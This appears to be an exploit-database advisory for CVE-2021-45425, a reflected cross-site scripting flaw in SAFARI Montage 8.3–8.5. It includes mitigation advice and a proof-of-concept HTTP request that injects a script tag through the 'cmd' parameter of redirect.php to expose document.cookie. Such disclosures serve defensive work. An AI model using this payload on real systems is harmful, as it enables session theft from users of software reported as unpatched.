SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)

vendor:

SAFARI Montage

by:

Momen Eldawakhly - Cyber Guy - (Resecurity Inc)

6.1

CVSS

MEDIUM

Reflected Cross Site Scripting (XSS)

CWE

Product Name: SAFARI Montage

Affected Version From: 8.3

Affected Version To: 8.5

Patch Exists: NO

Related CWE: CVE-2021-45425

CPE: a:safari_montage:safari_montage:8.3 cpe:/a:safari_montage:safari_montage:8.5

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu Linux [Firefox]

2021

SAFARI Montage 8.5 – Reflected Cross Site Scripting (XSS)

The SAFARI Montage version 8.5 is vulnerable to a reflected cross-site scripting (XSS) attack. An attacker can execute arbitrary JavaScript code in the victim's browser by injecting malicious code through the 'redirect.php' parameter 'cmd'. This vulnerability allows the attacker to steal sensitive information, such as session cookies, from the victim.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in dynamic web content. Implementing proper input validation and output encoding can help prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
# Date: 28/12/2021
# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)
# Vendor Homepage: https://www.safarimontage.com/
# Version: 8.3 and 8.5
# Tested on: Ubuntu Linux [Firefox]
# CVE: CVE-2021-45425

# Proof of Concept:

GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1
Host: vulnIP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=SSSION; lang=en
Connection: close